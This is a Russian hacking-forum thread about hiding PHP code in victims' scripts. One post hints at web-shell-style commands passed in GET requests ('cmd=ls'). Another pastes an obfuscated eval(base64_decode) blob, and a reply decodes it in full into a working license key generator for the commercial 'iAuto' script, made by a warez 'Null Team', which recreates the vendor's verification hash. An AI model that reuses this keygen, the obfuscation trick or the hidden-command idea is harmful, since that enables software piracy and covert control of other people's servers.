Скрываем свой Php код в скрипте жертвы

[lance]

А смысл прятать свой код в лицезии? Её ж никто не читает
Если серьёзно, то от нормального админа ничё не скроешь, а от тупого и ленивого прятать код не надо, главное, чтобы в логах GET запросов не было типа "script.php?id=12&cmd=ls".

 

[mixa]

вот читаю про морал нулонных и задаюсь диву я уверен кто пишет про морал сам использует левую винду и весь софт к нему. так что сначала за сабой подотри а потом учи других что делать
а к спецам вопрос такой ламера так сказать
есть код
<?php
eval(base64_decode('Pz48P3BocA0KY2xhc3MgY3J5cHRvZ3JhcGhlcg0Kew0KCQl2YXIgJGV4cGlyYXRpb25fZGF0ZTsNCgkJdmFyICRzaX
RlX3VybDsNCgkJdmFyICRpbnNlcnRlZF93b3JkczsNCgkJZnVuY3Rpb24gY3J5cHRvZ3JhcGhlcigkZXhwaXJhdGlv
bl9kYXRlLCAkc2l0ZV91cmwpDQoJCXsNCgkJCQkkdGhpcy0+ZXhwaXJhdGlvbl9kYXRlID0gJGV4cGlyYXRpb25fZG
F0ZTsNCgkJCQkkdGhpcy0+c2l0ZV91cmwgPSBlbXB0eSgkc2l0ZV91cmwpID8gIiIgOiAkc2l0ZV91cmw7DQoJCQkJ
JHRoaXMtPmluc2VydGVkX3dvcmRzID0gYXJyYXkoImFzZGZnMTQyMzUiLCAiKiZeJVwkUlRHRlZCSkw6KSgqIiwgIi
09K1tdbExMTDdnZmRAIik7DQoJCX0NCgkJZnVuY3Rpb24gZ2V0Y3J5cHQoKQ0KCQl7DQoJCQkJcmV0dXJuICR0aGlz
LT5fZ2V0ZW5jcnlwdGVkY29tYmluYXRpb24oJHRoaXMtPl9nZXRjb21iaW5lZHVuZW5jcnlwdGVkc3RyaW5nKCksID
ApOw0KCQl9DQoJCWZ1bmN0aW9uIF9nZXRjb21iaW5lZHVuZW5jcnlwdGVkc3RyaW5nKCkNCgkJew0KCQkJCSRyZXN1
bHQgPSBqb2luKCIiLCAkdGhpcy0+aW5zZXJ0ZWRfd29yZHMpOw0KCQkJCXJldHVybiAkdGhpcy0+ZXhwaXJhdGlvbl
9kYXRlIC4gJHJlc3VsdCAuICR0aGlzLT5zaXRlX3VybDsNCgkJfQ0KCQlmdW5jdGlvbiBfZ2V0ZW5jcnlwdGVkY29t
YmluYXRpb24oJHN0cmluZywgJGNvdW50ZXIpDQoJCXsNCgkJCQlpZiAoNSA8ICRjb3VudGVyKQ0KCQkJCXsNCgkJCQ
kJCXJldHVybiAkc3RyaW5nOw0KCQkJCX0NCgkJCQkkcmVzdWx0ID0gbWQ1KCRzdHJpbmcpIC4gY3JjMzIoJHN0cmlu
ZykgLiBiYXNlNjRfZW5jb2RlKCRzdHJpbmcpOw0KCQkJCSRyZXN1bHQgPSBtZDUoJHJlc3VsdCkgLiBiYXNlNjRfZW
5jb2RlKCRzdHJpbmcpIC4gY3JjMzIoJHN0cmluZykgLiBtZDUoJHJlc3VsdCk7DQoJCQkJcmV0dXJuICR0aGlzLT5f
Z2V0ZW5jcnlwdGVkY29tYmluYXRpb24oJHJlc3VsdCwgKyskY291bnRlcik7DQoJCX0NCn0NCj8+DQo8IURPQ1RZUE
UgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53
My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3
d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29u
dGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPmlBdXRvIExpY2Vuc2UgR2VuZXJhdG9yIF
tpQUd9IE51bGwgVGVhbTwvdGl0bGU+DQo8c2NyaXB0IGxhbmd1YWdlPSJKYXZhc2NyaXB0Ij4NCjwhLS0NCgl2YXIg
Y29weXRvY2xpcD0xDQoJZnVuY3Rpb24gSGlnaGxpZ2h0QWxsKHRoZUZpZWxkKSB7DQoJCXZhciB0ZW1wdmFsPWV2YW
woImRvY3VtZW50LiIrdGhlRmllbGQpDQoJCXRlbXB2YWwuZm9jdXMoKQ0KCQl0ZW1wdmFsLnNlbGVjdCgpDQoJCWlm
IChkb2N1bWVudC5hbGwmJmNvcHl0b2NsaXA9PTEpIHsNCgkJCXRoZXJhbmdlPXRlbXB2YWwuY3JlYXRlVGV4dFJhbm
dlKCkNCgkJCXRoZXJhbmdlLmV4ZWNDb21tYW5kKCJDb3B5IikNCgkJCXdpbmRvdy5zdGF0dXM9IkNvbnRlbnRzIGhp
Z2hsaWdodGVkIGFuZCBjb3BpZWQgdG8gY2xpcGJvYXJkISINCgkJCXNldFRpbWVvdXQoIndpbmRvdy5zdGF0dXM9Jy
ciLDE4MDApDQoJCX0NCgl9DQovLy0tPg0KPC9zY3JpcHQ+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0K
Zm9ybSB7DQoJcGFkZGluZzowOw0KCW1hcmdpbjowOw0KfQ0KI2xrZXkgew0KCWJhY2tncm91bmQtY29sb3I6ICNFOE
VCRUU7DQoJcGFkZGluZzogMTBweDsNCgl3aWR0aDogODAwcHg7DQoJYm9yZGVyOiAxcHggc29saWQgIzk5Q0NDQzsN
CgltYXJnaW46IDAgYXV0bzsNCglmb250LWZhbWlseTogVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZX
JpZjsNCglmb250LXNpemU6IDExcHg7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQojbGtleSAja2V5c3RyaW5nZnJv
bnQsIA0KI2xrZXkgI2tleXN0cmluZ2JhY2sgew0KCXdpZHRoOiA5NiU7DQoJaGVpZ2h0OiAxMDBweDsNCglib3JkZX
I6IDFweCBzb2xpZCAjM0E0NzY1Ow0KCWJhY2tncm91bmQtaW1hZ2U6IHVybCh0ZW1wL2Zvcm1iZy5qcGcpOw0KCWJh
Y2tncm91bmQtcmVwZWF0OiBuby1yZXBlYXQ7DQoJYmFja2dyb3VuZC1wb3NpdGlvbjogbGVmdCB0b3A7DQoJZm9udC
13ZWlnaHQ6IGJvbGQ7DQoJZm9udC1zaXplOiAxMHB4Ow0KCWZvbnQtZmFtaWx5OiBWZXJkYW5hLCBBcmlhbCwgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmOw0KCXBhZGRpbmc6IDEwcHg7DQp9DQojbGtleSAubm90aWNlIHsNCglmb250LWZhbW
lseTogVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsNCglmb250LXNpemU6IDEwcHg7DQoJZm9u
dC13ZWlnaHQ6IGJvbGQ7DQoJY29sb3I6ICM3Mjg0QUQ7DQoJbWFyZ2luLXRvcDogNDBweDsNCn0NCi5zdGVwIHsNCg
lmb250LXNpemU6MjRweDsNCglmb250LXdlaWdodDpib2xkOw0KCWNvbG9yOiNGRjAwMDA7DQp9DQoudGV4dCB7DQoJ
YmFja2dyb3VuZC1jb2xvcjojRkZGRkZGOw0KCWZvbnQtd2VpZ2h0OiBub3JtYWw7DQoJY29sb3I6IzMzMzMzMzsNCg
lib3JkZXI6IDFweCBzb2xpZCAjM0E0NzY1Ow0KCXBhZGRpbmc6NXB4Ow0KCWxpbmUtaGVpZ2h0OjIwcHg7DQp9DQou
aW5wdXQgew0KCWhlaWdodDoyNHB4Ow0KCWZvbnQtc2l6ZToxOHB4Ow0KCXBhZGRpbmctYm90dG9tOjJweDsNCglwYW
RkaW5nLWxlZnQ6NnB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICMzQTQ3NjU7DQoJZm9udC13ZWlnaHQ6bm9ybWFsOw0K
CWJhY2tncm91bmQ6IHVybCh0ZW1wL2Zvcm1iZy5qcGcpIG5vLXJlcGVhdCAtM3B4IC00cHg7DQp9DQpsYWJlbCB7DQ
oJZm9udC1zaXplOjE0cHg7DQoJY29sb3I6IzY2NjY2NjsNCn0NCi5idXR0b24gew0KCWhlaWdodDozNHB4Ow0KCXdp
ZHRoOjE1MHB4Ow0KCWZvbnQtc2l6ZToxNHB4Ow0KCWZvbnQtd2VpZ2h0OmJvbGQ7DQoJY29sb3I6IzY2NjY2NjsNCn
0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQo8P3BocA0KZnVuY3Rpb24gY3VyUGFnZVVSTCgpDQp7
DQoJCSRwYWdlVVJMID0gJ2h0dHAnOw0KCQlpZiAoJF9TRVJWRVJbIkhUVFBTIl0gPT0gIm9uIikNCgkJew0KCQkJCS
RwYWdlVVJMIC49ICJzIjsNCgkJfQ0KCQkkcGFnZVVSTCAuPSAiOi8vIjsNCgkJaWYgKCRfU0VSVkVSWyJTRVJWRVJf
UE9SVCJdICE9ICI4MCIpDQoJCXsNCgkJCQkkcGFnZVVSTCAuPSAkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSAuICI6Ii
AuICRfU0VSVkVSWyJTRVJWRVJfUE9SVCJdIC4gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQoJCX0NCgkJZWxzZQ0K
CQl7DQoJCQkJJHBhZ2VVUkwgLj0gJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0gLiAkX1NFUlZFUlsiUkVRVUVTVF9VUk
kiXTsNCgkJfQ0KCQkkY3VyRmlsZSA9ICcva2V5Z2VuLnBocCc7DQoJCSR0ZXN0ID0gc3RyX3JlcGxhY2UoJGN1ckZp
bGUsICcnLCAkcGFnZVVSTCk7DQoJCXJldHVybiAkdGVzdDsNCn0NCiRub3JtYWxVcmwgPSBjdXJQYWdlVVJMKCk7DQ
okYWRtaW5VcmwgPSAkbm9ybWFsVXJsIC4gIi9hZG1pbiI7DQppZiAoJF9QT1NUKQ0Kew0KCQlpZiAoISRfUE9TVFsn
Zm5hbWUnXSB8fCAhJF9QT1NUWydsbmFtZSddIHx8ICEkX1BPU1RbJ2VtYWlsYWRkcmVzcyddIHx8ICEkX1BPU1RbJ3
dlYnNpdGVhZGRyZXNzJ10gfHwgISRfUE9TVFsnYWRtaW5hZGRyZXNzJ10pDQoJCXsNCgkJCQkkZXJyb3IgPSAnJzsN
CgkJCQlpZiAoISRfUE9TVFsnZm5hbWUnXSkNCgkJCQl7DQoJCQkJCQkkZXJyb3IgLj0gJzxiciAvPjxzdHJvbmc+PG
ZvbnQgY29sb3I9IiNGRjAwMDAiPkVycm9yOiBGaWxsIGluIFlvdXIgRmlyc3RuYW1lITwvZm9udD48L3N0cm9uZz48
YnIgLz4nOw0KCQkJCX0NCgkJCQlpZiAoISRfUE9TVFsnbG5hbWUnXSkNCgkJCQl7DQoJCQkJCQkkZXJyb3IgLj0gJz
xiciAvPjxzdHJvbmc+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkVycm9yOiBGaWxsIGluIFlvdXIgTGFzdG5hbWUhPC9m
b250Pjwvc3Ryb25nPjxiciAvPic7DQoJCQkJfQ0KCQkJCWlmICghJF9QT1NUWydlbWFpbGFkZHJlc3MnXSkNCgkJCQ
l7DQoJCQkJCQkkZXJyb3IgLj0gJzxiciAvPjxzdHJvbmc+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkVycm9yOiBGaWxs
IGluIFlvdXIgRW1haWwgQWRyZXNzITwvZm9udD48L3N0cm9uZz48YnIgLz4nOw0KCQkJCX0NCgkJCQlpZiAoISRfUE
9TVFsnd2Vic2l0ZWFkZHJlc3MnXSkNCgkJCQl7DQoJCQkJCQkkZXJyb3IgLj0gJzxiciAvPjxzdHJvbmc+PGZvbnQg
Y29sb3I9IiNGRjAwMDAiPkVycm9yOiBGaWxsIGluIFlvdXIgaUF1dG8gVXJsITwvZm9udD48L3N0cm9uZz48YnIgLz
4nOw0KCQkJCX0NCgkJCQlpZiAoISRfUE9TVFsnYWRtaW5hZGRyZXNzJ10pDQoJCQkJew0KCQkJCQkJJGVycm9yIC49
ICc8YnIgLz48c3Ryb25nPjxmb250IGNvbG9yPSIjRkYwMDAwIj5FcnJvcjogRmlsbCBpbiBZb3VyIGlBdXRvIEFkbW
luIFVybCE8L2ZvbnQ+PC9zdHJvbmc+PGJyIC8+JzsNCgkJCQl9DQoJCQkJZWNobyAkZXJyb3I7DQoJCX0NCgkJZWxz
ZQ0KCQl7DQoJCQkJaWYgKCEkZXJyb3IpDQoJCQkJew0KCQkJCQkJJGRhdGUgPSAkX1BPU1RbJ2RhdGUnXTsNCgkJCQ
kJCSRmbmFtZSA9ICRfUE9TVFsnZm5hbWUnXTsNCgkJCQkJCSRsbmFtZSA9ICRfUE9TVFsnbG5hbWUnXTsNCgkJCQkJ
CSRlbWFpbGFkZHJlc3MgPSAkX1BPU1RbJ2VtYWlsYWRkcmVzcyddOw0KCQkJCQkJJHdlYnNpdGVhZGRyZXNzID0gJF
9QT1NUWyd3ZWJzaXRlYWRkcmVzcyddOw0KCQkJCQkJJGFkbWluYWRkcmVzcyA9ICRfUE9TVFsnYWRtaW5hZGRyZXNz
J107DQoNCj8+DQo8ZGl2IGlkPSJsa2V5Ij4NCgk8Zm9ybSBuYW1lPSJtZXNzYWdlIj4NCgkJPGRpdiBjbGFzcz0ic3
RlcCI+U3RlcCAyLjwvZGl2Pg0KCQk8ZGl2IGNsYXNzPSJ0ZXh0Ij5Db3B5IHRoZSBpbmZvcm1hdGlvbiBiZWxvdyB0
byB5b3VyIENsaXBCb2FyZCwgb3BlbiB0aGUgIjxzdHJvbmc+bGljZW5zZTwvc3Ryb25nPiIgZmlsZSAod2l0aG91dC
BleHRlbnNpb24pIGxvY2F0ZWQgaW4gdGhlICI8c3Ryb25nPm1haW48L3N0cm9uZz4iIGRpcmVjdG9yeSBvZiB5b3Vy
IGlBdXRvIGluc3RhbGxhdGlvbiBhbmQgcGFzdGUgaXQgKENUUkwtVikuIFNhdmUgdGhpcyBmaWxlIGFuZCB1cGxvYW
QgaXQgaW4gQklOQVJZIG1vZGUuPC9kaXY+DQoJCTxkaXYgc3R5bGU9ImNsZWFyOmJvdGg7Ij48IS0tIC0tPjwvZGl2
Pg0KCQk8YnIgLz4NCjw/cGhwDQokY3J5cHRvZ3JhcGhlciA9IG5ldyBjcnlwdG9ncmFwaGVyKCRkYXRlLCAkd2Vic2
l0ZWFkZHJlc3MpOw0KZWNobyAnPHRleHRhcmVhIG5hbWU9ImtleXN0cmluZ2Zyb250IiBjb2xzPSI0NSIgcm93cz0i
NSIgcmVhZG9ubHk9InJlYWRvbmx5IiB3cmFwPSJwaHlzaWNhbCIgaWQ9ImtleXN0cmluZ2Zyb250Ij4NCmZpcnN0X2
5hbWUgPSAiJyAuICRmbmFtZSAuICciOw0KbGFzdF9uYW1lID0gIicgLiAkbG5hbWUgLiAnIjsNCmVtYWlsID0gIicg
LiAkZW1haWxhZGRyZXNzIC4gJyI7DQpzaXRlX3VybCA9ICInIC4gJHdlYnNpdGVhZGRyZXNzIC4gJyI7DQpleHBpcm
F0aW9uX2RhdGUgPSAiJyAuICRkYXRlIC4gJyI7DQp2ZXJpZmljYXRpb25fY29kZSA9ICInIC4gJGNyeXB0b2dyYXBo
ZXItPmdldGNyeXB0KCkgLiAnIjsNCjwvdGV4dGFyZWE+JzsNCj8+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0Oy
BtYXJnaW4tcmlnaHQ6MHB4OyBtYXJnaW4tdG9wOiA0cHg7Ij4NCgkJCTxpbnB1dCBuYW1lPSJCdXR0b24iIHR5cGU9
ImJ1dHRvbiIgY2xhc3M9ImFsbCIgb25DbGljaz0iSGlnaGxpZ2h0QWxsKCdtZXNzYWdlLmtleXN0cmluZ2Zyb250Jy
kiIHZhbHVlPSJDb3B5IEtleSB0byBDbGlwQm9hcmQiIC8+DQoJCTwvZGl2Pg0KCQk8ZGl2IHN0eWxlPSJjbGVhcjpi
b3RoOyI+PCEtLSAtLT48L2Rpdj4NCgkJPGJyIC8+PGJyIC8+PGJyIC8+DQoJCTxkaXYgc3R5bGU9ImNsZWFyOmJvdG
g7Ij48IS0tIC0tPjwvZGl2Pg0KCQk8ZGl2IGNsYXNzPSJzdGVwIj5TdGVwIDMuPC9kaXY+DQoJCTxkaXYgY2xhc3M9
InRleHQiPkNvcHkgdGhlIGluZm9ybWF0aW9uIGJlbG93IHRvIHlvdXIgQ2xpcEJvYXJkLCBvcGVuIHRoZSAiPHN0cm
9uZz5saWNlbnNlPC9zdHJvbmc+IiBmaWxlICh3aXRob3V0IGV4dGVuc2lvbikgbG9jYXRlZCBpbiB0aGUgIjxzdHJv
bmc+YWRtaW48L3N0cm9uZz4iIGRpcmVjdG9yeSBvZiB5b3VyIGlBdXRvIGluc3RhbGxhdGlvbiBhbmQgcGFzdGUgaX
QgKENUUkwtVikuIFNhdmUgdGhpcyBmaWxlIGFuZCB1cGxvYWQgaXQgaW4gQklOQVJZIG1vZGUgdG8geW91ciAiPHN0
cm9uZz5hZG1pbjwvc3Ryb25nPiIgZGlyZWN0b3J5LjwvZGl2Pg0KCQk8ZGl2IHN0eWxlPSJjbGVhcjpib3RoOyI+PC
EtLSAtLT48L2Rpdj4NCgkJPGJyIC8+DQo8P3BocA0KJGNyeXB0b2FkbWluID0gbmV3IGNyeXB0b2dyYXBoZXIoJGRh
dGUsICRhZG1pbmFkZHJlc3MpOw0KZWNobyAnPHRleHRhcmVhIG5hbWU9ImtleXN0cmluZ2JhY2siIGNvbHM9IjQ1Ii
Byb3dzPSI1IiByZWFkb25seT0icmVhZG9ubHkiIHdyYXA9InBoeXNpY2FsIiBpZD0ia2V5c3RyaW5nYmFjayI+DQpm
aXJzdF9uYW1lID0gIicgLiAkZm5hbWUgLiAnIjsNCmxhc3RfbmFtZSA9ICInIC4gJGxuYW1lIC4gJyI7DQplbWFpbC
A9ICInIC4gJGVtYWlsYWRkcmVzcyAuICciOw0Kc2l0ZV91cmwgPSAiJyAuICRhZG1pbmFkZHJlc3MgLiAnIjsNCmV4
cGlyYXRpb25fZGF0ZSA9ICInIC4gJGRhdGUgLiAnIjsNCnZlcmlmaWNhdGlvbl9jb2RlID0gIicgLiAkY3J5cHRvYW
RtaW4tPmdldGNyeXB0KCkgLiAnIjsNCjwvdGV4dGFyZWE+JzsNCj8+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0
OyBtYXJnaW4tcmlnaHQ6MHB4OyBtYXJnaW4tdG9wOiA0cHg7Ij4NCgkJCTxpbnB1dCBuYW1lPSJCdXR0b24iIHR5cG
U9ImJ1dHRvbiIgY2xhc3M9ImFsbCIgb25DbGljaz0iSGlnaGxpZ2h0QWxsKCdtZXNzYWdlLmtleXN0cmluZ2JhY2sn
KSIgdmFsdWU9IkNvcHkgS2V5IHRvIENsaXBCb2FyZCIgLz4NCgkJPC9kaXY+DQoJCTxkaXYgc3R5bGU9ImNsZWFyOm
JvdGg7Ij48IS0tIC0tPjwvZGl2Pg0KCQk8ZGl2IGNsYXNzPSJzdGVwIj5TdGVwIDQuPC9kaXY+DQoJCTxkaXYgY2xh
c3M9InRleHQiPkVuam95IDspPC9kaXY+DQoJPC9mb3JtPg0KPC9kaXY+DQoNCjw/cGhwDQoJCQkJfQ0KCQkJCWV4aX
Q7DQoJCX0NCgkJDQp9DQo/Pg0KPGRpdiBpZD0ibGtleSI+DQoJPGZvcm0gYWN0aW9uPSJrZXlnZW4ucGhwIiBtZXRo
b2Q9InBvc3QiPg0KCQk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYXRlIiB2YWx1ZT0iMjAxOC0wMS0wMSIgLz
4NCgkJPGRpdiBjbGFzcz0ic3RlcCI+U3RlcCAxLjwvZGl2Pg0KCQk8ZGl2IGNsYXNzPSJ0ZXh0Ij5QbGVhc2UgY29t
cGxldGUgdGhlIGZvcm0gYmVsb3cgdG8gZ2VuZXJhdGUgeW91ciBpQXV0byBTaXRlICZhbXA7IEFkbWluIGxpY2Vuc2
VzPC9kaXY+DQoJCTxkaXYgc3R5bGU9ImNsZWFyOmJvdGg7Ij48IS0tIC0tPjwvZGl2Pg0KCQk8YnIgLz4NCgkJPGxh
YmVsIGZvcj0iZm5hbWUiPllvdXIgRmlyc3RuYW1lICZhbXA7IExhc3RuYW1lPC9sYWJlbD48YnIgLz4NCgkJPGlucH
V0IHR5cGU9InRleHQiIGNsYXNzPSJpbnB1dCIgbmFtZT0iZm5hbWUiIHZhbHVlPSJCaWxsIiBzdHlsZT0id2lkdGg6
MTUwcHg7IiAvPiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCBjbGFzcz0iaW5wdXQiIHR5cGU9InRleHQiIG5hbWU9Im
xuYW1lIiBzdHlsZT0id2lkdGg6MjUwcHg7IiB2YWx1ZT0iR2F5LXRlcyIgLz4gSnVzdCBlbnRlciBzb21lIG5vbi1y
ZWFsIG5hbWU8YnIgLz48YnIgLz4NCgkJPGxhYmVsIGZvcj0iZW1haWxhZGRyZXNzIj5Zb3VyIEVtYWlsIEFkZHJlc3
M8L2xhYmVsPjxiciAvPg0KCQk8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9ImlucHV0IiBuYW1lPSJlbWFpbGFkZHJl
c3MiIHN0eWxlPSJ3aWR0aDo0MjBweDsiIHZhbHVlPSIiIC8+PGJyIC8+PGJyIC8+DQoJCTxsYWJlbCBmb3I9IndlYn
NpdGVhZGRyZXNzIj5Zb3VyIGlBdXRvIHdlYnNpdGUgVXJsPC9sYWJlbD48YnIgLz4NCgkJPGlucHV0IHR5cGU9InRl
eHQiIGNsYXNzPSJpbnB1dCIgbmFtZT0id2Vic2l0ZWFkZHJlc3MiIHN0eWxlPSJ3aWR0aDo0MjBweDsiIHZhbHVlPS
I8P3BocCBlY2hvICRub3JtYWxVcmw7ID8+IiAvPiBEZWZhdWx0IHNob3VsZCBiZSBPay4gTm8gdHJhaWxpbmcgLyBh
dCB0aGUgZW5kITxiciAvPjxiciAvPg0KCQk8bGFiZWwgZm9yPSJhZG1pbmFkZHJlc3MiPllvdXIgaUF1dG8gYWRtaW
4gVXJsPC9sYWJlbD48YnIgLz4NCgkJPGlucHV0IHR5cGU9InRleHQiIGNsYXNzPSJpbnB1dCIgbmFtZT0iYWRtaW5h
ZGRyZXNzIiBzdHlsZT0id2lkdGg6NDIwcHg7IiB2YWx1ZT0iPD9waHAgZWNobyAkYWRtaW5Vcmw7ID8+IiAvPiBEZW
ZhdWx0IHNob3VsZCBiZSBPay4gTm8gdHJhaWxpbmcgLyBhdCB0aGUgZW5kITxiciAvPjxiciAvPg0KCQk8ZGl2IHN0
eWxlPSJmbG9hdDpyaWdodDsgbWFyZ2luLXJpZ2h0OjBweDsgbWFyZ2luLXRvcDogNHB4OyI+DQoJCQk8aW5wdXQgbm
FtZT0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidXR0b24iIHZhbHVlPSJHZW5lcmF0ZSBMaWNlbnNlIiAv
Pg0KCQk8L2Rpdj4NCgkJPGRpdiBzdHlsZT0iY2xlYXI6Ym90aDsiPjwhLS0gLS0+PC9kaXY+DQoJPC9mb3JtPg0KPC
9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+PD8='));
?>

что он может означать????

Добавлено в [time]1276340364[/time]
вот читаю про морал нулонных и задаюсь диву я уверен кто пишет про морал сам использует левую винду и весь софт к нему. так что сначала за сабой подотри а потом учи других что делать
а к спецам вопрос такой ламера так сказать
есть код что он может означать????

 

[ammok]

mixa

?><?php
class cryptographer
{
var $expiration_date;
var $site_url;
var $inserted_words;
function cryptographer($expiration_date, $site_url)
{
$this->expiration_date = $expiration_date;
$this->site_url = empty($site_url) ? "" : $site_url;
$this->inserted_words = array("asdfg14235", "*&^%\$RTGFVBJL(*", "-=+[]lLLL7gfd@");
}
function getcrypt()
{
return $this->_getencryptedcombination($this->_getcombinedunencryptedstring(), 0);
}
function _getcombinedunencryptedstring()
{
$result = join("", $this->inserted_words);
return $this->expiration_date . $result . $this->site_url;
}
function _getencryptedcombination($string, $counter)
{
if (5 < $counter)
{
return $string;
}
$result = md5($string) . crc32($string) . base64_encode($string);
$result = md5($result) . base64_encode($string) . crc32($string) . md5($result);
return $this->_getencryptedcombination($result, ++$counter);
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>iAuto License Generator [iAG} Null Team</title>
<script language="Javascript">
<!--
var copytoclip=1
function HighlightAll(theField) {
var tempval=eval("document."+theField)
tempval.focus()
tempval.select()
if (document.all&&copytoclip==1) {
therange=tempval.createTextRange()
therange.execCommand("Copy")
window.status="Contents highlighted and copied to clipboard!"
setTimeout("window.status=''",1800)
}
}
//-->
</script>
<style type="text/css">
<!--
form {
padding:0;
margin:0;
}
#lkey {
background-color: #E8EBEE;
padding: 10px;
width: 800px;
border: 1px solid #99CCCC;
margin: 0 auto;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
font-weight: bold;
}
#lkey #keystringfront,
#lkey #keystringback {
width: 96%;
height: 100px;
border: 1px solid #3A4765;
background-image: url(temp/formbg.jpg);
background-repeat: no-repeat;
background-position: left top;
font-weight: bold;
font-size: 10px;
font-family: Verdana, Arial, Helvetica, sans-serif;
padding: 10px;
}
#lkey .notice {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
font-weight: bold;
color: #7284AD;
margin-top: 40px;
}
.step {
font-size:24px;
font-weight:bold;
color:#FF0000;
}
.text {
background-color:#FFFFFF;
font-weight: normal;
color:#333333;
border: 1px solid #3A4765;
padding:5px;
line-height:20px;
}
.input {
height:24px;
font-size:18px;
padding-bottom:2px;
padding-left:6px;
border: 1px solid #3A4765;
font-weight:normal;
background: url(temp/formbg.jpg) no-repeat -3px -4px;
}
label {
font-size:14px;
color:#666666;
}
.button {
height:34px;
width:150px;
font-size:14px;
font-weight:bold;
color:#666666;
}
-->
</style>
</head>

<body>
<?php
function curPageURL()
{
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on")
{
$pageURL .= "s";
}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80")
{
$pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
}
else
{
$pageURL .= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
}
$curFile = '/keygen.php';
$test = str_replace($curFile, '', $pageURL);
return $test;
}
$normalUrl = curPageURL();
$adminUrl = $normalUrl . "/admin";
if ($_POST)
{
if (!$_POST['fname'] || !$_POST['lname'] || !$_POST['emailaddress'] || !$_POST['websiteaddress'] || !$_POST['adminaddress'])
{
$error = '';
if (!$_POST['fname'])
{
$error .= '
<strong><font color="#FF0000">Error: Fill in Your Firstname!</font></strong>
';
}
if (!$_POST['lname'])
{
$error .= '
<strong><font color="#FF0000">Error: Fill in Your Lastname!</font></strong>
';
}
if (!$_POST['emailaddress'])
{
$error .= '
<strong><font color="#FF0000">Error: Fill in Your Email Adress!</font></strong>
';
}
if (!$_POST['websiteaddress'])
{
$error .= '
<strong><font color="#FF0000">Error: Fill in Your iAuto Url!</font></strong>
';
}
if (!$_POST['adminaddress'])
{
$error .= '
<strong><font color="#FF0000">Error: Fill in Your iAuto Admin Url!</font></strong>
';
}
echo $error;
}
else
{
if (!$error)
{
$date = $_POST['date'];
$fname = $_POST['fname'];
$lname = $_POST['lname'];
$emailaddress = $_POST['emailaddress'];
$websiteaddress = $_POST['websiteaddress'];
$adminaddress = $_POST['adminaddress'];

?>
<div id="lkey">
<form name="message">
<div class="step">Step 2.</div>
<div class="text">Copy the information below to your ClipBoard, open the "<strong>license</strong>" file (without extension) located in the "<strong>main</strong>" directory of your iAuto installation and paste it (CTRL-V). Save this file and upload it in BINARY mode.</div>
<div style="clear:both;"><!-- --></div>


<?php
$cryptographer = new cryptographer($date, $websiteaddress);
echo '<textarea name="keystringfront" cols="45" rows="5" readonly="readonly" wrap="physical" id="keystringfront">
first_name = "' . $fname . '";
last_name = "' . $lname . '";
email = "' . $emailaddress . '";
site_url = "' . $websiteaddress . '";
expiration_date = "' . $date . '";
verification_code = "' . $cryptographer->getcrypt() . '";
</textarea>';
?>
<div style="float:right; margin-right:0px; margin-top: 4px;">
<input name="Button" type="button" class="all" onClick="HighlightAll('message.keystringfront')" value="Copy Key to ClipBoard" />
</div>
<div style="clear:both;"><!-- --></div>




<div style="clear:both;"><!-- --></div>
<div class="step">Step 3.</div>
<div class="text">Copy the information below to your ClipBoard, open the "<strong>license</strong>" file (without extension) located in the "<strong>admin</strong>" directory of your iAuto installation and paste it (CTRL-V). Save this file and upload it in BINARY mode to your "<strong>admin</strong>" directory.</div>
<div style="clear:both;"><!-- --></div>


<?php
$cryptoadmin = new cryptographer($date, $adminaddress);
echo '<textarea name="keystringback" cols="45" rows="5" readonly="readonly" wrap="physical" id="keystringback">
first_name = "' . $fname . '";
last_name = "' . $lname . '";
email = "' . $emailaddress . '";
site_url = "' . $adminaddress . '";
expiration_date = "' . $date . '";
verification_code = "' . $cryptoadmin->getcrypt() . '";
</textarea>';
?>
<div style="float:right; margin-right:0px; margin-top: 4px;">
<input name="Button" type="button" class="all" onClick="HighlightAll('message.keystringback')" value="Copy Key to ClipBoard" />
</div>
<div style="clear:both;"><!-- --></div>
<div class="step">Step 4.</div>
<div class="text">Enjoy </div>
</form>
</div>

<?php
}
exit;
}

}
?>
<div id="lkey">
